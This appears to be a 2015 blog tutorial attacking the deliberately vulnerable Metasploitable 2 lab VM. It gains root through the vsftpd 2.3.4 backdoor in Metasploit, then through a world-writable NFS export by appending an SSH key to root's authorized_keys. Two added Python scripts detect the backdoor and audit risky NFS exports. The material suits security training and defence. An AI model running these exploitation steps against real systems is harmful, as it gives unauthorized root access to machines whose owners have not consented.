Wednesday, 27 May 2015

Metasploitable2: Hack FTP Server and NFS Server using Kali Linux


The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

We have installed 'Metasploitable 2' and Kali Linux as Virtual Machines in KVM in CentOS7. For Instructions on how to install Metasploitable 2 Virtual Machine in KVM, refer to this post.

In a previous post, we carried out a vulnerability scan of the 'Metasploitable 2' virtual machine using OpenVAS in Kali Linux.

The scan found the following vulnerability in 'vsftpd':

vsftpd Compromised Source Packages Backdoor Vulnerability



In this tutorial, we will exploit this vulnerability using Metasploit and get 'root' access on the machine.

1) Start Metasploit.
root@kali:~# msfconsole


2) Search for the vsftpd vulnerability
msf > search vsftpd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution


3) Use the vulnerability
msf > use exploit/unix/ftp/vsftpd_234_backdoor


4) Set the IP address of the 'victim' machine
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.122.73
RHOST => 192.168.122.73


5) Exploit the vulnerability and get root access.
msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.122.115:42588 -> 192.168.122.73:6200) at 2015-05-27 14:29:55 +0530

id
uid=0(root) gid=0(root)
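From the defender's side, the two artefacts this session leaves behind are the service banner (a build that identifies itself as vsFTPd 2.3.4) and a second vsftpd process listening on port 6200, the port the session line above connects to. The following is an added example, not part of the original post or of Metasploit: it parses an FTP banner and an `ss -tlnp` listing (the listing is constructed sample data, not taken from the VM) and flags both indicators.

```python
import re

BACKDOORED_VERSION = "2.3.4"  # the trojaned vsftpd build reported by the scan
BACKDOOR_PORT = 6200          # port the backdoor shell listens on (see session line above)

BANNER_RE = re.compile(r"^220 \(vsFTPd ([0-9][0-9.]*)\)")
PROC_RE = re.compile(r'users:\(\("([^"]+)"')

def banner_version(banner):
    """Return the version string from a vsftpd greeting, or None if not vsftpd."""
    m = BANNER_RE.match(banner.strip())
    return m.group(1) if m else None

def is_backdoored_build(banner):
    """True when the greeting names the version the scan flagged."""
    return banner_version(banner) == BACKDOORED_VERSION

# Constructed sample in `ss -tlnp` layout (assumed values, not real VM output)
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      32     0.0.0.0:21          0.0.0.0:*         users:(("vsftpd",pid=4210,fd=3))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=1190,fd=3))
LISTEN 0      1      0.0.0.0:6200        0.0.0.0:*         users:(("vsftpd",pid=4213,fd=4))
"""

def backdoor_listeners(ss_output, port=BACKDOOR_PORT):
    """Return (port, process) for every LISTEN socket bound to the backdoor port."""
    hits = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        local_port = int(fields[3].rsplit(":", 1)[-1])
        if local_port != port:
            continue
        m = PROC_RE.search(line)
        hits.append((local_port, m.group(1) if m else "unknown"))
    return hits

if __name__ == "__main__":
    print(is_backdoored_build("220 (vsFTPd 2.3.4)"))   # True
    print(backdoor_listeners(SAMPLE_SS))               # [(6200, 'vsftpd')]
```

The listener check only matters while a session is live; the banner check is what tells you the build should be replaced before anyone connects.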


After an attacker has gained 'root' access, he will typically install a rootkit so that he can come and go at will and hide his activities from the administrator. The rootkit will attempt to remove all traces of the attacker's presence from the log files and replace binaries such as ls, ps, ifconfig, killall, netstat, lsof and passwd. In a future tutorial, we will see how to use 'tripwire' and 'chkrootkit' to detect rootkits.


Attack NFS and get root login

During the Vulnerability Scan of the 'Metasploitable 2' virtual machine in a previous post, we found the following misconfiguration in NFS Server.

The root file system is exported in read/write mode.

root@kali:~# showmount -e 192.168.122.73
Export list for 192.168.122.73:
/ *


Getting access to a system with a writable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file:


root@kali:~# mount -o nolock 192.168.122.73:/ /mnt


root@kali:~# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase):  
Enter same passphrase again:  
Your identification has been saved in /root/.ssh/id_rsa. 
Your public key has been saved in /root/.ssh/id_rsa.pub.


root@kali:~# cat .ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys


root@kali:~# umount /mnt


root@kali:~# ssh 192.168.122.73
Last login: Mon May 25 07:46:57 2015 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
root@metasploitable:~#
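The misconfiguration behind this login is entirely visible in the server's /etc/exports, so it can be caught before anyone mounts the share. The following is an added example, not code from the original post: it parses an exports file (the content below is constructed, not copied from the Metasploitable VM) and flags the properties that made the attack work, namely exporting "/", exporting to any host ("*"), read/write access, and no_root_squash, the option that lets a remote root write files as uid 0 such as /root/.ssh/authorized_keys.

```python
# Constructed /etc/exports content (assumed for the example, not the VM's real file)
SAMPLE_EXPORTS = """\
# /etc/exports: NFS exports
/           *(rw,sync,no_root_squash)
/srv/share  192.168.122.0/24(ro,sync)
/home/backup *(rw,sync)
"""

def parse_exports(text):
    """Return (path, client, options) for every client spec in an exports file."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:] or ["*"]   # no client spec at all means everyone
        for spec in specs:
            client, _, opts = spec.partition("(")
            options = {o.strip() for o in opts.rstrip(")").split(",") if o.strip()}
            entries.append((path, client or "*", options))
    return entries

def audit_exports(text):
    """List risky exports with the reasons each one is flagged."""
    findings = []
    for path, client, options in parse_exports(text):
        reasons = []
        if path == "/":
            reasons.append("exports the root filesystem")
        if client == "*":
            reasons.append("exported to any host")
        if "rw" in options:
            reasons.append("read/write")
        if "no_root_squash" in options:
            reasons.append("no_root_squash: remote root writes as uid 0")
        if reasons:
            findings.append((path, client, reasons))
    return findings

if __name__ == "__main__":
    for path, client, reasons in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: {', '.join(reasons)}")
```

With the default root_squash in place, the root user on the attacking host would have been mapped to nobody and the append to /root/.ssh/authorized_keys would have failed; restricting the client list to specific hosts closes the wildcard as well.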



